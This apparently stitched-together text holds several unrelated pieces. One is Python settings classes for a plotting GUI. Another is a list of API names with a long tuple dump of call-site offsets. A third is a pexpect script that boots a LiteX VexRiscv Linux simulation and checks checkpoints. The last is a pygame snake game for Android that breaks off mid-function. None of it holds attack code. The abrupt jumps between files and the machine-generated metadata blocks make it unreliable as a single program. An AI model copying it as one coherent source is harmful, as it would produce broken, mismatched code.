class VariableDrawstyle(Variable):
    """Per-variable drawstyle selection (default vs. step modes)."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Drawstyle'
        self._choices = ('Default', 'Steps (pre)', 'Steps (mid)', 'Steps (post)')
        self._choice_images = (None,) * 4
class VariableLinestyle(Variable):
    """Per-variable linestyle selection."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Linestyle'
        self._choices = ('Solid', 'Dashed', 'Dash-dot', 'Dotted')
        self._choice_images = (None,) * 4
# ======================================================================================================================
# Settings variables
# ======================================================================================================================
class SettingsUnitSystem(Variable):
    """Application-wide unit-system setting (Field or Metric)."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Unit system'
        self._choices = ('Field', 'Metric')
        self._choice_images = (None,) * 2
# Shared choice tables for the size pickers below.
LINE_SIZES = tuple(str(n) for n in range(1, 11))        # '1' .. '10'
TEXT_SIZES = tuple(str(n) for n in range(6, 26, 2))     # '6', '8', .. '24'
TEXT_BITMAPS = (None,) * len(TEXT_SIZES)                # no icons for text sizes
class SettingsLinewidth(Variable):
    """Line-width setting: choices '1'..'10' with one icon per width."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Linewidth'
        self._choices = LINE_SIZES
        # One icon per width, named ico.linewidth_<n>_16x16.
        self._choice_images = tuple(getattr(ico, 'linewidth_%d_16x16' % n)
                                    for n in range(1, 11))
class SettingsMarkerSize(Variable):
    """Marker-size setting: choices '1'..'10' with one icon per size."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Marker size'
        self._choices = LINE_SIZES
        # One icon per size, named ico.markersize_<n>_16x16.
        self._choice_images = tuple(getattr(ico, 'markersize_%d_16x16' % n)
                                    for n in range(1, 11))
class SettingsTickLabelSize(Variable):
    """Tick-label font-size setting, drawn from the shared TEXT_SIZES table."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Tick-label size'
        self._choices = TEXT_SIZES
        self._choice_images = TEXT_BITMAPS
class SettingsLabelSize(Variable):
    """Axis-label font-size setting, drawn from the shared TEXT_SIZES table."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Label size'
        self._choices = TEXT_SIZES
        self._choice_images = TEXT_BITMAPS
class SettingsLegendSize(Variable):
    """Legend font-size setting, drawn from the shared TEXT_SIZES table."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Legend size'
        self._choices = TEXT_SIZES
        self._choice_images = TEXT_BITMAPS
# Percentile choice table shared by the low/mid/high case and shading pickers.
PERCENTILE_OPTIONS = ('P05', 'P10', 'P20', 'P25', 'P30', 'P40', 'P50',
                      'P60', 'P70', 'P75', 'P80', 'P90', 'P95')
PERCENTILE_BITMAPS = (None,) * len(PERCENTILE_OPTIONS)
class SettingsLowCase(Variable):
    """Percentile used as the 'low' case."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Low case'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
class SettingsMidCase(Variable):
    """Percentile used as the 'mid' case."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Mid case'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
class SettingsHighCase(Variable):
    """Percentile used as the 'high' case."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'High case'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
class SettingsShadingResolution(Variable):
    """Number of bands used when shading the uncertainty envelope."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Resolution'
        self._choices = ('2', '4', '6', '8', '10')
        self._choice_images = (None,) * 5
class SettingsShadingLow(Variable):
    """Percentile used as the lower bound of the shaded envelope."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Low bound'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
class SettingsShadingHigh(Variable):
    """Percentile used as the upper bound of the shaded envelope."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'High bound'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
# ======================================================================================================================
# Duplicate variables
# ======================================================================================================================
class Duplicates(Variable):
    """Integer count of duplicates to create."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = int
        self._unit = AmountUnit()
        self._frame_label = '# of duplicates'
        self._tooltip = 'Number of duplicates to create.'
class DuplicateAsControlled(Variable):
    """Boolean flag: duplicate entities as 'controlled' by the original."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = bool
        self._frame_label = 'Duplicate as controlled'
        self._tooltip = ('Duplicated entities will only allow minor\n'
                         'configuration. All properties will be determined\n'
                         'by the controlling entity (the one duplicated).')
|
[
"utilities.wxdate2pydate",
"utilities.pydate2wxdate",
"numpy.array",
"properties.SummaryProperty",
"utilities.GetAttributes"
] |
[((6204, 6294), 'utilities.GetAttributes', 'GetAttributes', (['self'], {'exclude': "('_correlation_labels', '_correlation_matrix')", 'sort': '(True)'}), "(self, exclude=('_correlation_labels', '_correlation_matrix'),\n sort=True)\n", (6217, 6294), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n'), ((6987, 7107), 'utilities.GetAttributes', 'GetAttributes', (['self'], {'exclude': "('_summaries', '_correlation_labels', '_correlation_matrix')", 'attr_only': '(True)', 'sort': '(True)'}), "(self, exclude=('_summaries', '_correlation_labels',\n '_correlation_matrix'), attr_only=True, sort=True)\n", (7000, 7107), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n'), ((16442, 16459), 'properties.SummaryProperty', 'SummaryProperty', ([], {}), '()\n', (16457, 16459), False, 'from properties import SummaryProperty\n'), ((31450, 31478), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), '([0.0, 176.0, 80.0])\n', (31458, 31478), True, 'import numpy as np\n'), ((31922, 31949), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (31930, 31949), True, 'import numpy as np\n'), ((32404, 32434), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (32412, 32434), True, 'import numpy as np\n'), ((32897, 32927), 'numpy.array', 'np.array', (['[51.0, 102.0, 153.0]'], {}), '([51.0, 102.0, 153.0])\n', (32905, 32927), True, 'import numpy as np\n'), ((33006, 33033), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (33014, 33033), True, 'import numpy as np\n'), ((33485, 33515), 'numpy.array', 'np.array', (['[219.0, 34.0, 211.0]'], {}), '([219.0, 34.0, 211.0])\n', (33493, 33515), True, 'import numpy as np\n'), ((33991, 34018), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (33999, 34018), True, 'import numpy as np\n'), ((34505, 34535), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 
213.0])\n', (34513, 34535), True, 'import numpy as np\n'), ((35015, 35044), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', (35023, 35044), True, 'import numpy as np\n'), ((35949, 35977), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), '([0.0, 176.0, 80.0])\n', (35957, 35977), True, 'import numpy as np\n'), ((36380, 36407), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (36388, 36407), True, 'import numpy as np\n'), ((36821, 36851), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (36829, 36851), True, 'import numpy as np\n'), ((37273, 37303), 'numpy.array', 'np.array', (['[51.0, 102.0, 153.0]'], {}), '([51.0, 102.0, 153.0])\n', (37281, 37303), True, 'import numpy as np\n'), ((37730, 37760), 'numpy.array', 'np.array', (['[219.0, 34.0, 211.0]'], {}), '([219.0, 34.0, 211.0])\n', (37738, 37760), True, 'import numpy as np\n'), ((38195, 38222), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (38203, 38222), True, 'import numpy as np\n'), ((38668, 38698), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (38676, 38698), True, 'import numpy as np\n'), ((39137, 39166), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', (39145, 39166), True, 'import numpy as np\n'), ((40084, 40112), 'numpy.array', 'np.array', (['[0.0, 134.0, 61.0]'], {}), '([0.0, 134.0, 61.0])\n', (40092, 40112), True, 'import numpy as np\n'), ((40542, 40569), 'numpy.array', 'np.array', (['[192.0, 0.0, 0.0]'], {}), '([192.0, 0.0, 0.0])\n', (40550, 40569), True, 'import numpy as np\n'), ((41010, 41040), 'numpy.array', 'np.array', (['[51.0, 126.0, 195.0]'], {}), '([51.0, 126.0, 195.0])\n', (41018, 41040), True, 'import numpy as np\n'), ((41494, 41522), 'numpy.array', 'np.array', (['[51.0, 63.0, 79.0]'], {}), '([51.0, 63.0, 79.0])\n', (41502, 41522), True, 'import numpy as np\n'), ((41981, 
42010), 'numpy.array', 'np.array', (['[153.0, 0.0, 153.0]'], {}), '([153.0, 0.0, 153.0])\n', (41989, 42010), True, 'import numpy as np\n'), ((42477, 42504), 'numpy.array', 'np.array', (['[192.0, 0.0, 0.0]'], {}), '([192.0, 0.0, 0.0])\n', (42485, 42504), True, 'import numpy as np\n'), ((42982, 43012), 'numpy.array', 'np.array', (['[51.0, 126.0, 195.0]'], {}), '([51.0, 126.0, 195.0])\n', (42990, 43012), True, 'import numpy as np\n'), ((43483, 43512), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', (43491, 43512), True, 'import numpy as np\n'), ((44588, 44618), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (44596, 44618), True, 'import numpy as np\n'), ((44681, 44710), 'numpy.array', 'np.array', (['[217.0, 83.0, 25.0]'], {}), '([217.0, 83.0, 25.0])\n', (44689, 44710), True, 'import numpy as np\n'), ((45117, 45145), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), '([0.0, 176.0, 80.0])\n', (45125, 45145), True, 'import numpy as np\n'), ((45208, 45235), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (45216, 45235), True, 'import numpy as np\n'), ((45627, 45654), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (45635, 45654), True, 'import numpy as np\n'), ((45717, 45747), 'numpy.array', 'np.array', (['[122.0, 48.0, 160.0]'], {}), '([122.0, 48.0, 160.0])\n', (45725, 45747), True, 'import numpy as np\n'), ((46160, 46190), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (46168, 46190), True, 'import numpy as np\n'), ((46607, 46634), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (46615, 46634), True, 'import numpy as np\n'), ((47050, 47080), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (47058, 47080), True, 'import numpy as np\n'), ((47488, 47516), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), 
'([0.0, 176.0, 80.0])\n', (47496, 47516), True, 'import numpy as np\n'), ((47947, 47976), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', (47955, 47976), True, 'import numpy as np\n'), ((48854, 48885), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (48862, 48885), True, 'import numpy as np\n'), ((49295, 49326), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (49303, 49326), True, 'import numpy as np\n'), ((49737, 49768), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (49745, 49768), True, 'import numpy as np\n'), ((50195, 50226), 'numpy.array', 'np.array', (['[255.0, 217.0, 102.0]'], {}), '([255.0, 217.0, 102.0])\n', (50203, 50226), True, 'import numpy as np\n'), ((9740, 9760), 'utilities.wxdate2pydate', 'wxdate2pydate', (['value'], {}), '(value)\n', (9753, 9760), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n'), ((14590, 14610), 'utilities.pydate2wxdate', 'pydate2wxdate', (['value'], {}), '(value)\n', (14603, 14610), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n')]
|
#!/usr/bin/env python3
#
# This file is part of Linux-on-LiteX-VexRiscv
#
# Copyright (c) 2019-2021, Linux-on-LiteX-VexRiscv Developers
# SPDX-License-Identifier: BSD-2-Clause
import os
import sys
import pexpect
import time
from argparse import ArgumentParser
# Command-line interface: the SDRAM module name is forwarded into the
# `tests` table below and ultimately to sim.py.
parser = ArgumentParser()
parser.add_argument("--sdram-module", type=str)
args = parser.parse_args()
# Test matrix: each entry is expanded as run_test(**test) at the bottom of
# the file.  'checkpoints' are matched in order against the simulator output;
# byte-string regexes are used because pexpect reads the child's raw byte stream.
tests = [
    {
        'id': 'linux-on-litex-vexriscv',
        'command': f'./sim.py --with-sdram --sdram-module {args.sdram_module}',
        'cwd': os.getcwd(),
        'checkpoints': [
            { 'timeout': 240, 'good': [b'\n\\s*BIOS built on'] },
            { 'timeout': 60, 'good': [b'\n\\s*VexRiscv Machine Mode software'] },
            { 'timeout': 240, 'good': [b'Memory: \\d+K/\\d+K available'] },
        ]
    }
]
def run_test(id, command, cwd, checkpoints):
    """Spawn *command* in *cwd* and match the output against *checkpoints* in order.

    Each checkpoint is a dict with an optional 'timeout' (seconds), a 'good'
    pattern list and an optional 'bad' pattern list.  Returns True only when
    every checkpoint matched one of its 'good' patterns; EOF, a timeout, or a
    'bad' match makes the test fail.

    NOTE: the parameter name `id` shadows the builtin but is part of the
    test-dict interface (run_test(**test)), so it is kept.
    """
    print(f'*** Test ID: {id}')
    print(f'*** CWD: {cwd}')
    print(f'*** Command: {command}')
    os.chdir(cwd)
    p = pexpect.spawn(command, timeout=None, logfile=sys.stdout.buffer)

    checkpoint_id = 0
    for cp in checkpoints:
        good = cp.get('good', [])
        bad = cp.get('bad', [])
        patterns = good + bad
        timeout = cp.get('timeout', None)

        # Use distinct names for the start timestamp and the elapsed time
        # (the original reused `timediff` for both, which was confusing).
        start = time.time()
        try:
            match_id = p.expect(patterns, timeout=timeout)
        except pexpect.EOF:
            print(f'\n*** {id}: premature termination')
            return False
        except pexpect.TIMEOUT:
            elapsed = time.time() - start
            print(f'\n*** {id}: timeout (checkpoint {checkpoint_id}: +{int(elapsed)}s)')
            return False
        elapsed = time.time() - start

        if match_id >= len(good):
            # A 'bad' pattern matched: stop checking further checkpoints.
            break

        sys.stdout.buffer.write(b'<<checkpoint %d: +%ds>>' % (checkpoint_id, int(elapsed)))
        checkpoint_id += 1

    is_success = checkpoint_id == len(checkpoints)

    # Let it print rest of line
    match_id = p.expect_exact([b'\n', pexpect.TIMEOUT, pexpect.EOF], timeout=1)
    p.terminate(force=True)

    line_break = '\n' if match_id != 0 else ''
    print(f'{line_break}*** {id}: {"success" if is_success else "failure"}')
    return is_success
# Run every configured test; abort with a non-zero exit code on the first failure.
for test in tests:
    if not run_test(**test):
        sys.exit(1)
sys.exit(0)
|
[
"pexpect.spawn",
"argparse.ArgumentParser",
"os.getcwd",
"time.time",
"os.chdir",
"sys.exit"
] |
[((273, 289), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (287, 289), False, 'from argparse import ArgumentParser\n'), ((2297, 2308), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2305, 2308), False, 'import sys\n'), ((965, 978), 'os.chdir', 'os.chdir', (['cwd'], {}), '(cwd)\n', (973, 978), False, 'import os\n'), ((987, 1050), 'pexpect.spawn', 'pexpect.spawn', (['command'], {'timeout': 'None', 'logfile': 'sys.stdout.buffer'}), '(command, timeout=None, logfile=sys.stdout.buffer)\n', (1000, 1050), False, 'import pexpect\n'), ((528, 539), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (537, 539), False, 'import os\n'), ((1259, 1270), 'time.time', 'time.time', ([], {}), '()\n', (1268, 1270), False, 'import time\n'), ((2284, 2295), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2292, 2295), False, 'import sys\n'), ((1666, 1677), 'time.time', 'time.time', ([], {}), '()\n', (1675, 1677), False, 'import time\n'), ((1508, 1519), 'time.time', 'time.time', ([], {}), '()\n', (1517, 1519), False, 'import time\n')]
|
import pygame_sdl2
# Install pygame_sdl2 as a drop-in replacement so the 'pygame' import below
# resolves to the SDL2 backend (required for the Android build).
pygame_sdl2.import_as_pygame()
import random
import pygame
from pygame.locals import *
import android
class AppleTypes:
    """Apple kinds as plain ints (they index APPLE_COLORS elsewhere)."""
    NORMAL = 0
    GOLDEN = 1
    LIFE = 2
    SPECIAL = 3
class Apple:
    """A food item placed on a free cell; its type decides scoring and behaviour."""

    def __init__(self, snakes):
        # Re-roll the position until it does not land on any snake segment.
        retry = True
        while retry:
            retry = False
            self.x = random.randint(0, CELL_COUNT_X - 1)
            self.y = random.randint(0, CELL_COUNT_Y - 1)
            for snake in snakes:
                for i in range(0, snake.length):
                    if self.x == snake.x[i] and self.y == snake.y[i]:
                        retry = True
        # 9-in-12 chance of a normal apple, 1-in-12 each for golden/life/special.
        self.type = random.choice([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3])
        self.expiration = 0
        self.moves = 0
        self.direction = random.choice([0, 1, 2, 3])
        # BUG FIX: the original tested the *builtin* ``type`` (``if not type == ...``),
        # which is never equal to an int, so every apple got an expiration and no
        # apple was ever marked as moving.  Test self.type instead.
        if not self.type == AppleTypes.NORMAL:
            self.expiration = APPLE_EXPIRATION
        if self.type == AppleTypes.SPECIAL:
            self.moves = SPECIAL_FRAMES

    def move(self):
        """Advance a SPECIAL apple one cell every SPECIAL_FRAMES + 1 calls.

        The apple mostly keeps its heading (7-in-10) and bounces off the borders.
        """
        if self.moves > 0:
            self.moves -= 1
            return
        # Renamed from ``dir`` to avoid shadowing the builtin.
        step = random.choice([
            self.direction,
            self.direction,
            self.direction,
            self.direction,
            self.direction,
            self.direction,
            self.direction,
            (self.direction + 1) % 4,
            (self.direction + 2) % 4,
            (self.direction + 3) % 4])
        if step == 0:
            if not self.x == CELL_COUNT_X - 1:
                self.x += 1
            else:
                self.x -= 1
                self.direction = 2
        elif step == 1:
            if not self.y == CELL_COUNT_Y - 1:
                self.y += 1
            else:
                self.y -= 1
                self.direction = 3
        elif step == 2:
            if not self.x == 0:
                self.x -= 1
            else:
                self.x += 1
                self.direction = 1
        elif step == 3:
            if not self.y == 0:
                self.y -= 1
            else:
                self.y += 1
                self.direction = 0
        self.moves = SPECIAL_FRAMES

    def draw(self, surface, cell_size):
        """Draw the apple as a cell-sized square in its type's colour."""
        body = pygame.Surface((cell_size, cell_size))
        body.fill(APPLE_COLORS[self.type])
        surface.blit(body, (self.x * cell_size, self.y * cell_size))
class Snake:
    """A player snake: parallel x/y lists of cell coordinates, head at index 0."""

    def __init__(self, x, y, length, lives, color):
        self.x = [x]
        self.y = [y]
        self.length = length
        self.lives = lives
        self.color = color
        self.expiration = 0          # frames left before temp_color reverts to color
        self.temp_color = color
        # Face away from the nearer vertical border so the body extends behind the head.
        self.direction = 0 if self.x[0] < CELL_COUNT_X / 2 else 2
        self.score = 0
        for i in range(1, self.length):
            self.x.append(self.x[0] - i if self.x[0] < CELL_COUNT_X / 2 else self.x[0] + i)
            self.y.append(self.y[0])

    def changeDirection(self, direction):
        """Apply a turn unless it is a 180-degree reversal; return whether it was applied."""
        if direction != (self.direction + 2) % 4:
            self.direction = direction
            return True
        return False

    def updatePosition(self):
        """Shift every body segment to its predecessor's cell, then advance the head."""
        for i in range(self.length - 1, 0, -1):
            self.x[i] = self.x[i - 1]
            self.y[i] = self.y[i - 1]
        if self.direction == 0:
            self.x[0] += 1
        elif self.direction == 1:
            self.y[0] += 1
        elif self.direction == 2:
            self.x[0] -= 1
        elif self.direction == 3:
            self.y[0] -= 1

    def isCollision(self, x, y):
        """Return True when the head occupies cell (x, y)."""
        return self.x[0] == x and self.y[0] == y

    def changeColor(self, color):
        """Flash the snake in *color* for SNAKE_EXPIRATION frames."""
        self.temp_color = color
        self.expiration = SNAKE_EXPIRATION

    def addPiece(self, count):
        """Grow by *count* segments, each stacked on the current tail cell."""
        for _ in range(count):
            self.x.append(self.x[self.length - 1])
            self.y.append(self.y[self.length - 1])
            self.length += 1

    def eatApple(self, apple):
        """If the head is on *apple*: play its sound, grow and score.  Return True on eat."""
        if not self.isCollision(apple.x, apple.y):
            return False
        if apple.type == AppleTypes.NORMAL:
            SOUNDS['Apple'].play()
            self.addPiece(1)
            self.score += 10
        elif apple.type == AppleTypes.GOLDEN:
            SOUNDS['Golden'].play()
            self.addPiece(3)
            self.score += 50
        elif apple.type == AppleTypes.LIFE:
            SOUNDS['Life'].play()
            self.addPiece(1)
            # A life apple grants a life up to the cap of 5, otherwise points instead.
            if self.lives < 5:
                self.lives += 1
            else:
                self.score += 20
        elif apple.type == AppleTypes.SPECIAL:
            SOUNDS['Special'].play()
            self.addPiece(5)
            self.score += 100
        return True

    def hitSnake(self, snake):
        """Return True when the head hits *snake*'s body (penalising score and a life).

        When checking against itself the head segment is skipped; a snake already
        flashing RED is immune.
        """
        for i in range(1 if self is snake else 0, snake.length):
            if self.isCollision(snake.x[i], snake.y[i]) and not self.temp_color == RED:
                self.score -= 50
                self.lives -= 1
                return True
        return False

    def hitBorder(self):
        """Wrap the head around the field; penalise unless already flashing RED.

        The wrap/penalty logic was duplicated for the x and y axes in the
        original -- factored into one penalty path here (behaviour unchanged).
        """
        if self.x[0] < 0 or self.x[0] > CELL_COUNT_X - 1:
            self.x[0] = CELL_COUNT_X - 1 if self.x[0] < 0 else 0
        elif self.y[0] < 0 or self.y[0] > CELL_COUNT_Y - 1:
            self.y[0] = CELL_COUNT_Y - 1 if self.y[0] < 0 else 0
        else:
            return False
        if not self.temp_color == RED:
            self.score -= 20
            self.lives -= 1
            return True
        return False

    def draw(self, surface, cell_size):
        """Blit one filled square per segment; count down any temporary colour flash."""
        body = pygame.Surface((cell_size, cell_size))
        body.fill(self.temp_color)
        for i in range(0, self.length):
            surface.blit(body, (self.x[i] * cell_size, self.y[i] * cell_size))
        if self.expiration > 0:
            self.expiration -= 1
        else:
            self.temp_color = self.color
class Game:
    """One round of the game: the snakes, the current apple and the frame rules."""

    def __init__(self, players, fps, controls):
        self.fps = fps
        self.controls = controls
        self.snakes = []
        # BUG FIX: random.randint requires integer bounds; CELL_COUNT_X / 2 is a
        # float (rejected on modern Python 3) -- use floor division instead.
        self.snakes.append(Snake(random.randint(0, CELL_COUNT_X // 2),
                                 random.randint(0, CELL_COUNT_Y // 2), 15, 3, BLUE))
        if players == 2:
            self.snakes.append(Snake(random.randint(CELL_COUNT_X // 2, CELL_COUNT_X - 1),
                                     random.randint(CELL_COUNT_Y // 2, CELL_COUNT_Y - 1), 15, 3, GREEN))
        self.apple = Apple(self.snakes)

    def restart(self):
        """Return a fresh Game with the same player count, fps and control scheme."""
        return Game(len(self.snakes), self.fps, self.controls)

    def updateSnakes(self):
        """Advance one frame; return False as soon as any snake runs out of lives."""
        # Expired special apples revert to a normal one.
        if self.apple.expiration == 0:
            self.apple.type = AppleTypes.NORMAL
        else:
            self.apple.expiration -= 1
        if self.apple.type == AppleTypes.SPECIAL:
            self.apple.move()
        for snake in self.snakes:
            snake.updatePosition()
            if snake.hitSnake(snake) or snake.hitBorder():
                SOUNDS['Hit'].play()
                android.vibrate(0.2)
                snake.changeColor(RED)
                if snake.lives == 0:
                    return False
            if snake.eatApple(self.apple):
                if not self.apple.type == AppleTypes.NORMAL:
                    snake.changeColor(APPLE_COLORS[self.apple.type])
                self.apple = Apple(self.snakes)
        return True

    def drawSnakes(self, surface, cell_size):
        """Draw every snake, then the apple, onto *surface*."""
        for snake in self.snakes:
            snake.draw(surface, cell_size)
        self.apple.draw(surface, cell_size)
class Page(object):
    """Base class for a full-screen page drawn onto a shared surface."""

    def __init__(self, width, height, surface):
        self.surface = surface
        self.surface.fill(BLACK)
        self.buttons = {}

    def update(self):
        """Per-frame hook; the base page is static."""
        return

    def getButton(self, x, y):
        """Map a relative (0..1) position to the name of the button it hits, if any."""
        px = x * self.surface.get_width()
        py = y * self.surface.get_height()
        for name, rect in self.buttons.items():
            if rect.collidepoint(px, py):
                return name

    def display_text(self, text, dimension, color, position, background=None):
        """Render *text* with its midbottom at *position*; return its bounding rect."""
        font = pygame.font.Font('resources/font.otf', int(dimension))
        rendered = font.render(text, True, color, background)
        bounds = rendered.get_rect()
        bounds.midbottom = position
        self.surface.blit(rendered, bounds)
        return bounds
class Menu(Page):
    """Main menu: title banner plus the four navigation buttons."""

    def __init__(self, width, height, surface):
        super(Menu, self).__init__(width, height, surface)
        w, h = width, height
        # Title: 'Python VS Android' in the two player colours.
        self.display_text('Python', h / 4, BLUE, (2 * w / 7 + w / 64, 2 * h / 5))
        self.display_text('VS', h / 7, RED, (w / 2, 2 * h / 5 - h / 50))
        self.display_text('Android', h / 4, GREEN, (5 * w / 7, 2 * h / 5))
        self.buttons['Single'] = self.display_text('Single Player', h / 10, WHITE, (w / 3, 4.5 * h / 7))
        self.buttons['Multi'] = self.display_text('Multi Player', h / 10, WHITE, (2 * w / 3, 4.5 * h / 7))
        self.buttons['Settings'] = self.display_text(' Settings ', h / 10, BLACK, (w / 3, 6 * h / 7), WHITE)
        self.buttons['Leaderboard'] = self.display_text(' Leaderboard ', h / 10, BLACK, (2 * w / 3, 6 * h / 7), WHITE)
class Leaderboard(Page):
    """High-score page: top three scores per difficulty, filled in by update()."""

    def __init__(self, width, height, surface):
        super(Leaderboard, self).__init__(width, height, surface)
        w, h = width, height
        self.display_text('Leaderboard:', h / 6, YELLOW, (w / 2, 2 * h / 7))
        labels = ['Easy', 'Normal', 'Hard']
        for i in range(1, 4):
            self.display_text(str(i) + '.', h / 10, BLUE, (w / 12, h / 2 + (i + 1) * h / 10))
            self.display_text(labels[i - 1], h / 8, RED, (i * w / 4, h / 2))
        self.scores = {
            DIFFICULTY['Easy']: [],
            DIFFICULTY['Normal']: [],
            DIFFICULTY['Hard']: []
        }
        self.buttons['Menu'] = self.display_text('Back', h / 12, WHITE, (w / 16, 5 * h / 36))

    def update(self):
        """Redraw the top-three score columns for each difficulty."""
        super(Leaderboard, self).update()
        w = self.surface.get_width()
        h = self.surface.get_height()
        for name, x in (('Easy', w / 4), ('Normal', w / 2), ('Hard', 3 * w / 4)):
            score = self.scores[DIFFICULTY[name]]
            for i in range(0, min(len(score), 3)):
                self.display_text(str(score[i]), h / 10, WHITE, (x, h / 2 + (i + 2) * h / 10))
class Settings(Page):
    """Settings page: difficulty, control scheme and audio toggles, persisted to disk."""

    def __init__(self, width, height, surface):
        super(Settings, self).__init__(width, height, surface)
        self.display_text('Difficulty:', height / 7, WHITE, (width / 3, 2 * height / 6))
        self.display_text('Controls:', height / 7, WHITE, (width / 3 - width / 70, 7 * height / 12))
        self.display_text('Audio:', height / 7, WHITE, (width / 3 - width / 20, 5 * height / 6))
        self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
        # Defaults, possibly overridden by the saved settings file.
        self.difficulty = 1
        self.controls = 0
        self.sound = True
        self.music = True
        self.loadSettings()
        pygame.mixer.music.set_volume(1 if self.music else 0)

    def update(self):
        """Redraw the current values (they double as toggle buttons)."""
        super(Settings, self).update()
        width = self.surface.get_width()
        height = self.surface.get_height()
        key = list(DIFFICULTY.keys())[self.difficulty]
        self.buttons['Difficulty'] = self.display_text(' ' + key + ' ', height / 7, RED, (7 * width / 10, 2 * height / 6), BLACK)
        self.buttons['Controls'] = self.display_text(' ' + CONTROLS[self.controls] + ' ', height / 7, RED, (7 * width / 10, 7 * height / 12), BLACK)
        self.buttons['Music'] = self.display_text(' Music ', height / 9, WHITE if self.music else RED, (4 * width / 5, 5 * height / 6 - height / 50), RED if self.music else BLACK)
        self.buttons['Sound'] = self.display_text(' Sound ', height / 9, WHITE if self.sound else RED, (3 * width / 5, 5 * height / 6 - height / 50), RED if self.sound else BLACK)

    def loadSettings(self):
        """Best-effort restore of saved settings; a missing/corrupt file keeps the defaults."""
        try:
            with open('resources/.settings', 'r') as f:
                for line in f:
                    # BUG FIX: the original used settings[1][:-1], which chops the
                    # last character of a final line without a trailing newline.
                    key, _, value = line.rstrip('\n').partition(':')
                    if key == 'Difficulty':
                        self.difficulty = int(value)
                    elif key == 'Controls':
                        self.controls = int(value)
                    elif key == 'Music':
                        self.music = value == 'True'
                    elif key == 'Sound':
                        self.sound = value == 'True'
        except Exception:
            # Was a bare ``except:`` -- keep the best-effort behaviour but stop
